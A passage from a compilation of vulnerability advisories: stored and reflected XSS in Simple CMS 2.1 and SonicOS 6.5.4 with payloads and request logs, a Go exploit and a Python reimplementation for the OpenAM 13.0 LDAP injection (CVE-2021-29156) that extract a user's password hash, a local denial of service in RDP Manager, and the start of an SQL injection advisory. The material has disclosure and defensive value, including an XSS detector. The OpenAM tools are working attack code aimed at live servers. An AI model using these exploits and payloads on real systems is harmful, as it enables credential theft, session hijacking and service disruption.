User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side.

The persistent cross site scripting vulnerability is located in the `name`, `username` and `password` parameters of the `newUser` and `editUser` modules. Remote attackers with a privileged application user account and panel access are able to inject their own malicious script code as credentials. The injected code executes on preview of the users list. Note that the users list prints the stored password value in clear text, which is how the `password` parameter reaches the page at all. The request method to inject is POST and the attack vector is persistent.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] newUser
[+] editUser

Vulnerable File(s):
[+] admin.php?act=users

Vulnerable Input(s):
[+] Name
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] name
[+] username
[+] password

Affected Module(s):
[+] Users (act=users) (Backend)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a privileged account and
with low user interaction. For security demonstration or to reproduce the persistent cross site scripting vulnerability
follow the provided information and steps below to continue.

PoC: Payload
"><img src='31337'onerror=alert(0)></img>

Vulnerable Source: admin.php?act=users
<tbody><tr>
<td class="headlist"><a href="admin.php?act=users&orderType=DESC&orderBy=name">Name</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=email">Email</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=username">Username</a></td>
<td class="headlist" width="23%">Password</td>
<td class="headlist" colspan="2"> </td>
</tr>
<tr>
<td class="bodylist">c"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">keymaster23@protonmail.com</td>
<td class="bodylist">d"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">e"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit"><img class="act" src="images/edit.png" alt="Edit"></a></td>
<td class="bodylistAct"><a class="delete" href="admin.php?act=delUser&id=7" onclick="return confirm('Are you sure you want to delete it?');" title="DELETE"><img class="act" src="images/delete.png" alt="DELETE"></a></td>
</tr>

--- PoC Session Logs (POST) [Create] ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=c"><img src='31337'onerror=alert(0)></img>&email=tester23@test.de&username=d"><img src='31337'onerror=alert(0)></img>&password=e"><img src='31337'onerror=alert(0)></img>&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 5258
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/31337
Host: simple-cms.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 196
content-type: text/html; charset=iso-8859-1

The second request (GET /simplecms/31337 with Referer admin.php) is the browser resolving the injected img src after the
users list was rendered; the response is text/html rather than an image, so the onerror handler runs. That request is the
observable confirmation that the stored value was emitted as markup rather than as encoded text.

Reference(s):
https://simple-cms.localhost:8000/simplecms/admin.php
https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all
warranties, either expressed or implied, including the warranties of merchantability and capability for a particular
purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of
the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade
with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability
Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights,
including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for
permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
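A check for the finding above, added here as an example and not part of the advisory or of Simple CMS: instead of searching the response for the raw payload string (which breaks as soon as the application encodes quotes differently from the scanner), the page is parsed the way a browser would parse it, and any element that ends up with an on* event-handler attribute is reported. `render_cell_vulnerable` models the CMS concatenating the stored value into the users list, `render_cell_fixed` is the hardened form (HTML-encode on output, the equivalent of PHP's htmlspecialchars with ENT_QUOTES), and `SAMPLE_USER_ROW` is constructed from the vulnerable source quoted in the advisory. `fetch` is a convenience for running the same check against a live admin.php?act=users with a valid session cookie.

```python
"""Detect stored XSS by parsing the rendered page, not by string-matching the payload."""
import html
from html.parser import HTMLParser
from urllib import request

# Payload from the advisory: a quote to break out of an attribute, then an
# img element whose onerror handler runs without any user interaction.
PAYLOAD = "\"><img src='31337'onerror=alert(0)></img>"

# Constructed sample: the users-list row quoted in the advisory, with the
# payload stored in the name, username and password columns.
SAMPLE_USER_ROW = (
    '<tr>'
    '<td class="bodylist">c"><img src=\'31337\'onerror=alert(0)></img></td>'
    '<td class="bodylist">keymaster23@protonmail.com</td>'
    '<td class="bodylist">d"><img src=\'31337\'onerror=alert(0)></img></td>'
    '<td class="bodylist">e"><img src=\'31337\'onerror=alert(0)></img></td>'
    '<td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit">'
    '<img class="act" src="images/edit.png" alt="Edit"></a></td>'
    '</tr>'
)


class _HandlerCollector(HTMLParser):
    """Records every on* attribute the parser turns into a real attribute.

    Encoded output never produces such attributes, because '&lt;img ...&gt;'
    is text to the parser, so a non-empty result means the stored value
    reached the DOM as markup."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name, value))


def active_handlers(page_html):
    """Return [(tag, attribute, value), ...] for every event handler in page_html."""
    parser = _HandlerCollector()
    parser.feed(page_html)
    parser.close()
    return parser.handlers


def render_cell_vulnerable(value):
    """Models the CMS behaviour: the stored value is concatenated into the list unchanged."""
    return '<td class="bodylist">%s</td>' % value


def render_cell_fixed(value):
    """Hardened form: encode on output so the value can only ever be text."""
    return '<td class="bodylist">%s</td>' % html.escape(value, quote=True)


def fetch(url, cookie):
    """Fetch an authenticated page (e.g. admin.php?act=users) to run active_handlers() on."""
    req = request.Request(url, headers={"Cookie": cookie})
    with request.urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    print(active_handlers(render_cell_vulnerable(PAYLOAD)))  # [('img', 'onerror', 'alert(0)')]
    print(active_handlers(render_cell_fixed(PAYLOAD)))       # []
    print(active_handlers(SAMPLE_USER_ROW))                  # three img/onerror entries
```

Against a live target the workflow is: submit the payload with the act=addUser request from the session log, then `active_handlers(fetch("https://host/simplecms/admin.php?act=users", "PHPSESSID=..."))`; an empty list after the vendor's fix is the regression check.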
-
OpenAM 13.0 - LDAP Injection
# Exploit Title: OpenAM 13.0 - LDAP Injection
# Date: 03/11/2021
# Exploit Author: Charlton Trezevant, GuidePoint Security
# Vendor Homepage: https://www.forgerock.com/
# Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0,
# https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam
# Version: OpenAM v13.0.0
# Tested on: go1.17.2 darwin/amd64
# CVE: CVE-2021-29156
#
# This vulnerability allows an attacker to extract a variety of information
# (such as a user's password hash) from vulnerable OpenAM servers via LDAP
# injection, using a character-by-character brute force attack.
#
# https://github.com/guidepointsecurity/CVE-2021-29156
# https://nvd.nist.gov/vuln/detail/CVE-2021-29156
# https://portswigger.net/research/hidden-oauth-attack-vectors

package main

// All of these dependencies are included in the standard library.
import (
	"container/ring"
	"fmt"
	"math/rand"
	"net/http"
	"net/url"
	"sync"
	"time"
)

func main() {
	// Base URL of the target OpenAM instance
	baseURL := "http://localhost/openam/"
	// Local proxy (such as Burp)
	proxy := "http://localhost:8080/"
	// Username whose hash should be dumped
	user := "amAdmin"

	// Configurable ratelimit
	// This script can go very, very fast. But it's likely that would overload Burp and the target server.
	// The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and
	// ~1700 requests.
	rateLimit := 6

	// Beginning of the LDAP injection payload. %s denotes the position of the username.
	// The closing ')' after the username terminates the filter term the server builds around the
	// webfinger resource, so everything that follows is parsed as additional filter clauses.
	payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user)
	partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername)

	// Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character
	// will be inserted.
	// testCharPayload ends the value with the LDAP '*' wildcard, so it is a prefix test ("does the stored
	// value begin with this?"). testCrackedPayload has no wildcard and is an exact-match test.
	// These are configured to dump password hashes. But you can reconfigure them to dump other data, such as
	// usernames/session IDs/etc depending on your use case.
	// N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump.
	testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
	testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"

	// The keyspace for brute-forcing individual characters is stored in a ringbuffer
	// You may need to change how this is initialized depending on the types of data you're
	// trying to retrieve. By default, this is configured for password hashes.
	dict := makeRing()

	// Working characters for each step are concatenated with this string. Further tests are conducted
	// using this value as it's built.
	// Importantly, if you already have part of the hash you can put it here as a crib. This allows you
	// to resume a previous brute-forcing session.
	password := ""

	proxyURL, _ := url.Parse(proxy)

	// You can modify the HTTP client configuration below.
	// For example, to disable the HTTP proxy or set a different
	// request timeout value.
	client := &http.Client{
		Transport: &http.Transport{
			Proxy: http.ProxyURL(proxyURL),
		},
		Timeout: 30 * time.Second,
	}

	// Channels used for internal signaling
	cracked := make(chan string, 1)
	foundChar := make(chan string, 1)

	wg := &sync.WaitGroup{}
	wg.Add(1)

	// All hacking tools need a header. You may experience a 10-15x performance improvement
	// if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered
	// ASCII art typical of these kinds of tools.
	printHeader()

loop:
	for {
		select {
		case <-cracked:
			// Full hash test succeeds, terminate everything
			// N.B. this feature does not work, see my comments on checkCracked.
			fmt.Printf("Cracked! Password hash is: \"%s\"\n", password)
			wg.Done()
			break loop
		case char := <-foundChar:
			// In the event that a test character succeeds, that thread will pass it along in the
			// foundChar channel to signal success. It's then concatenated with the known-good
			// password hash and the whole thing is tested in a query
			// This doesn't work because OpenAM doesn't respond to direct queries containing the password hash
			// in the manner I expect. But it might still work for other types of data.
			password += char
			fmt.Printf("Progress so far: '%s'\n", password)

			// Forgive these very ugly closures
			// The exact-match payload belongs here: checkCracked asks whether the whole value is known.
			go (func(client *http.Client, url, payload *string, password string, cracked *chan string) {
				// Add random jitter before submitting request
				time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
				time.Sleep(1 * time.Second)
				checkCracked(client, url, payload, &password, cracked)
			})(client, &partURL, &testCrackedPayload, password, &cracked)
		default:
			// The wildcard (prefix) payload belongs here: getChar asks whether prefix+char is a prefix.
			for i := 0; i < rateLimit-1; i++ {
				testChar := dict.Value.(string)
				go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) {
					time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
					time.Sleep(1 * time.Second)
					getChar(client, url, payload, &password, &testChar, foundChar)
				})(client, &partURL, &testCharPayload, password, testChar, &foundChar)
				dict = dict.Next()
			}
			time.Sleep(1 * time.Second)
		}
	}
	wg.Wait()
}

// checkCracked tests a complete string in a query against the OpenAM server to
// determine whether the exact, full hash has been retrieved.
// This doesn't actually work, because the server doesn't respond as I'd expect
// A better implementation would probably watch until all positions in the ringbuffer
// are exhausted in testing and terminate (since there's no way to progress further)
func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) {
	fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password))
	fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)

	req, err := http.NewRequest("GET", fullURL, nil)
	if err != nil {
		fmt.Printf("checkCracked: %s\n", err.Error())
		return
	}

	res, err := client.Do(req)
	if err != nil {
		fmt.Printf("checkCracked: %s\n", err.Error())
		return
	}
	defer res.Body.Close()

	// 200 means the injected filter matched the user's entry, 404 means it did not.
	if res.StatusCode == 200 {
		*cracked <- *password
		return
	}
	if res.StatusCode == 404 {
		return
	}
	fmt.Printf("checkCracked: got status code of %d for payload %s\n", res.StatusCode, fullPayload)
}

// getChar tests a given character at the end position of the configured payload and dumped hash progress.
func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) {
	// Concatenate test character -> password -> payload -> attack URL
	combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar))
	fullPayload := fmt.Sprintf(*payload, combinedPass)
	fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)

	req, err := http.NewRequest("GET", fullURL, nil)
	if err != nil {
		fmt.Printf("getChar: %s\n", err.Error())
		return
	}

	res, err := client.Do(req)
	if err != nil {
		fmt.Printf("getChar: %s\n", err.Error())
		return
	}
	defer res.Body.Close()

	if res.StatusCode == 200 {
		*foundChar <- *testChar
		return
	}
	if res.StatusCode == 404 {
		return
	}
	fmt.Printf("getChar: got status code of %d for payload %s\n", res.StatusCode, fullPayload)
}

// makeRing instantiates a ringbuffer and initializes it with test characters common in base64
// and password hash encodings.
// Bruteforcing on a character-by-character basis can only go as far as your dictionary will take
// you, so be sure to update these strings if the keyspace for your use case is different.
func makeRing() *ring.Ring {
	var upcase string = `ABCDEFGHIJKLMNOPQRSTUVWXYZ`
	var lcase string = `abcdefghijklmnopqrstuvwxyz`
	var num string = `1234567890`
	var punct string = `$+/.=`
	var dictionary string = upcase + lcase + num + punct

	buf := ring.New(len(dictionary))
	for _, c := range dictionary {
		buf.Value = fmt.Sprintf("%c", c)
		buf = buf.Next()
	}
	return buf
}

// printHeader is cool.
func printHeader() {
	fmt.Print("OpenAM 13.0 - LDAP Injection (CVE-2021-29156)\n" +
		"(c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com\n\n")
}
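The oracle the script above drives, reimplemented as an added example (this is not the author's code and not taken from the GuidePoint repository). It keeps the advisory's payload template and keyspace and adds the termination the author proposes in the checkCracked comment: extraction stops when no keyspace character extends the prefix, which also means a character outside the keyspace ends the run early rather than looping forever. `mock_oracle` is a constructed stand-in for a vulnerable server (200 when the injected prefix matches the stored value, 404 otherwise, as the advisory describes), `http_oracle` issues the same requests against a real base URL, and the sample secret is made up.

```python
"""Blind boolean LDAP injection via the OpenAM webfinger endpoint (CVE-2021-29156)."""
import string
from urllib import error, parse, request

# Keyspace from the advisory's ring buffer: base64 and common hash characters.
KEYSPACE = string.ascii_uppercase + string.ascii_lowercase + string.digits + "$+/.="

# Payload template from the advisory. The ')' after the username closes the filter
# term the server builds around the resource, (sunKeyValue=userPassword=<prefix>*)
# is the boolean test (LDAP '*' is a wildcard, so this is a begins-with test), and
# %2526 is a double-encoded '&' that survives two rounds of URL decoding.
PATH_TEMPLATE = (
    ".well-known/webfinger?resource=http://x/{user})"
    "(sunKeyValue=userPassword={prefix}*)(%2526"
    "&rel=http://openid.net/specs/connect/1.0/issuer"
)


def build_path(user, prefix):
    """URL path for one probe; the prefix is query-escaped like the Go tool does."""
    return PATH_TEMPLATE.format(user=user, prefix=parse.quote(prefix, safe=""))


def http_oracle(base_url, timeout=30):
    """Real oracle: GET base_url + path and return the HTTP status code."""
    def probe(path):
        try:
            with request.urlopen(base_url + path, timeout=timeout) as resp:
                return resp.status
        except error.HTTPError as exc:
            return exc.code
    return probe


def mock_oracle(secret):
    """Constructed stand-in for a vulnerable server: 200 if the injected prefix
    matches the stored value, 404 otherwise. Only for offline testing."""
    def probe(path):
        marker = "userPassword="
        start = path.index(marker) + len(marker)
        end = path.index("*)", start)
        prefix = parse.unquote(path[start:end])
        return 200 if secret.startswith(prefix) else 404
    return probe


def extract(probe, user, keyspace=KEYSPACE, crib="", max_len=128):
    """Recover the value one character at a time.

    `crib` resumes from an already-known prefix. The loop ends when no keyspace
    character extends the prefix: either the full value has been recovered or
    the next character is outside the keyspace, which is the termination the
    advisory's author suggests instead of a separate exact-match check."""
    value = crib
    while len(value) < max_len:
        for ch in keyspace:
            if probe(build_path(user, value + ch)) == 200:
                value += ch
                break
        else:
            break  # keyspace exhausted at this position
    return value


if __name__ == "__main__":
    # Offline demonstration against the constructed oracle.
    oracle = mock_oracle("Zm9v+YmFy/YmF6cXV4=")
    print(extract(oracle, "amAdmin"))
    # Live use: extract(http_oracle("http://localhost/openam/"), "amAdmin")
```

Each recovered character costs at most len(KEYSPACE) requests, so a 60-character value is on the order of 4000 sequential probes at worst; the Go tool's parallel workers spread the same probes over several connections. Characters such as `{`, `}` or `*` are not in the keyspace, so a stored value like `{SSHA}...` stops extraction at position 0 until the keyspace (and, for `*`, `(`, `)`, `\`, the filter escaping) is extended.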
-
RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
# Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.cinspiration.de/uebersicht4.html
# Software Link: https://www.cinspiration.de/download.html
# Version: 4.9.9.3
# Tested on: Windows

Document Title:
===============
RDP Manager v4.9.9.3 - Local Denial of Service Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2309

Release Date:
=============
2021-10-18

Vulnerability Laboratory ID (VL-ID):
====================================
2309

Common Vulnerability Scoring System:
====================================
3.6

Vulnerability Class:
====================
Denial of Service

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
RDP-Manager is a program for the better administration of several remote desktops and further connections. The
connection parameters as well as user name and password can be stored in the program, the latter also encrypted by an
external password if desired. When opened, the connections created are clearly structured in individual tabs in the
application window, which means that the overview is retained even if several connections are open.

(Copy of the Homepage: https://www.cinspiration.de/download.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local denial of service vulnerability in the RDP Manager
v4.9.9.3 Windows software client.
Vulnerability Disclosure Timeline:
==================================
2021-06-01: Researcher Notification & Coordination (Security Researcher)
2021-06-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Local

Severity Level:
===============
Low

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official RDP Manager v4.9.9.3 Windows software client.
The denial of service attack allows an attacker to freeze, block or crash a local process, service or component.

The local vulnerability is located in the Verbindungsname (connection name) and Server input fields of the Verbindung
(connection) Neu/Bearbeiten (new/edit) dialog. The Verbindungsname and Server inputs are not limited in length. This
allows a local attacker with user privileges to add a malformed server entry with a very large value that crashes the
application permanently (multiple application errors). The same entry can also be placed in the sqLitedatabase.db3 of a
zip backup and restored through the import function, which makes the software unusable until a full reinstall with
separate deletion of the stored data is performed to recover.

Successful exploitation of the denial of service vulnerability results in permanent unhandled software and application
crashes.
Vulnerable Input(s):
[+] Verbindungsname
[+] Server

Affected Module(s):
[+] Wiederherstellen (sqLitedatabase.db3)

Proof of Concept (PoC):
=======================
The local denial of service vulnerability can be exploited by attackers with system access privileges without user
interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps
below to continue.

Manual steps to reproduce ...
1. Install the RDP-Manager.exe software for Windows
2. Start the software and add a new entry in the main tab
3. Enter a very large value (1024 characters) in the Verbindungsname or Server field and save the entry
4. The software freezes and crashes with multiple errors in the current session, and after a restart it crashes
   permanently as well
   Note: Alternatively, export a database with a regular valid entry, modify it in the backup and restore it via import
5. Successful reproduction of the local denial of service vulnerability!

Because the malformed entry is persisted in the database and loaded at start-up, the crash survives restarts; removing
the stored database (or restoring a clean backup) is what recovers the application, not a restart.

Credits & Authors:
==================
N/A - Anonymous [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=N%2FA+-+Anonymous
-
Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
# Exploit Title: Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.sonicguard.com/NSV-800.asp
# Version: 6.5.4

Document Title:
===============
Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2272

Release Date:
=============
2021-10-18

Vulnerability Laboratory ID (VL-ID):
====================================
2272

Common Vulnerability Scoring System:
====================================
5

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
The design, implementation and deployment of modern network architectures, such as virtualization and cloud, continue
to be a game-changing strategy for many organizations. Virtualizing the data center, migrating to the cloud, or a
combination of both, demonstrates significant operational and economic advantages. However, vulnerabilities within
virtual environments are well-documented. New vulnerabilities are discovered regularly that yield serious security
implications and challenges. To ensure applications and services are delivered safely, efficiently and in a scalable
manner, while still combating threats harmful to all parts of the virtual framework including virtual machines (VMs),
application workloads and data must be among the top priorities.

(Copy of the Homepage: https://www.sonicguard.com/NSV-800.asp )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting web vulnerability in
SonicWall SonicOS 6.5.4.
Affected Product(s):
====================
Model: SonicWall SonicOS
Firmware: 6.5.4.4-44v-21-1288-aa5b8b01 (6.5.4)
OS: SonicOS Enhanced

Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Medium User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A client-side input validation vulnerability has been discovered in the official SonicWall SonicOS 6.5.4. The
vulnerability allows remote attackers to hijack session credentials or manipulate client-side requested application
content.

The vulnerability is located in the Common Name input field of the Decryption Service > Common Name > Show Connection
Failures module. Remote attackers with a low privileged user account can inject their own script code to compromise
session credentials. It is also possible to build specially crafted HTML pages with GET/POST method requests to hijack
non-expired user account sessions. The request method to inject is GET and the attack vector is located on the client
side without being persistent.

Successful exploitation of the vulnerability allows remote attackers to hijack session credentials (non-persistent),
phishing (non-persistent), external redirects to malicious sources (non-persistent) or client-side application content
manipulation.
Exploitation of the vulnerability requires low or medium user interaction and a low privileged (restricted) user
account.

Module(s):
[+] Decryption Service

Vulnerable Function(s):
[+] Edit (Bearbeiten)

Vulnerable Parameter(s):
[+] Common Name

Affected Module(s):
[+] Show Connection Failures

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers with user interaction. For
security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Log in as a restricted or privileged user to the SonicWall SonicOS 6.5.4 virtual firewall application
2. Open Decryption Service > Common Name > Show Connection Failures
3. Click on Edit and inject a JavaScript test payload into the restricted client content
4. Clicking anywhere outside the field temporarily saves the payload
5. The script code immediately executes in the web browser's context
6. Successful reproduction of the script code injection web vulnerability!
Vulnerable Source: Connection Failure List (getConnFailureList.json)
<div id="connFailureEntriesDiv" style="overflow-y: scroll; height: 544px;">
<table summary="" width="100%" cellspacing="0" cellpadding="4" border="0">
<tbody id="connFailureEntries"><tr><td class="listItem" width="5%"><input type="checkbox" id="failChk4181252134" class="failChk" data-id="4181251300" data-name="sfPKI-4411CA162CD7931145552C4C87F9603D55FC.22" data-override-name="><iframe src=evil.source onload=alert(document.domain)>" data-failure="7" onclick="onClickFailCheckbox(this);"></td>
<td class="listItem" width="15%">192.168.XX.XX</td><td class="listItem" width="15%">XX.XX.XX.XX</td>
<td class="listItem" width="30%">>"<iframe src="evil.source" onload="alert(document.domain)"></iframe></td>

The override name is taken from the JSON data set and written into the table cell as markup, which is why the browser
serialises it as a real iframe element (the last td above) rather than as text.

--- PoC Session Logs (Cookie: SessId=F0FF65AA4C2B22B0655546584DCFAF65) ---
https://nsv800.localhost:9281/evil.source
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://nsv800.localhost:9281/sslSpyConfigure.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: text/html;charset=UTF-8
-
https://nsv800.localhost:9281/getJsonData.json?dataSet=alertStatus&_=1625248460727
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://nsv800.localhost:9281/logo.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: application/json
Accept-Ranges: bytes

The first logged request (GET /evil.source with Referer sslSpyConfigure.html) is the browser loading the injected
iframe's src from the firewall's own origin, i.e. the payload was already rendered as markup by the time that request
was sent.

Reference(s):
nsv800.localhost:9281/main.html
nsv800.localhost:9281/getJsonData.json
nsv800.localhost:9281/sslSpyConfigure.html

Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the client-side reflected script code passed through
getJsonData.json and sslSpyConfigure. The input and output parameters need to be sanitized (HTML-encoded before they
are inserted into the page) to prevent script code injection.

Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the SonicWall SonicOS series is estimated
as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
-
Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux

Document Title:
===============
Simplephpscripts Simple CMS v2.1 - SQL Injection

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2303

Release Date:
=============
2021-10-19

Vulnerability Laboratory ID (VL-ID):
====================================
2303

Common Vulnerability Scoring System:
====================================
7.1

Vulnerability Class:
====================
SQL Injection

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents. Just paste a
single line of code on your web page section and start controlling it through the admin area. Very simple installation -
one step installation wizard. Option to include contents into web page sections through php include, javascript or
iframe embed. Any language support. WYSIWYG(text) editor to styling and format contents of the sections. Suitable for
web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote SQL injection web vulnerability in the
Simplephpscripts Simple CMS v2.1 web-application.
Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
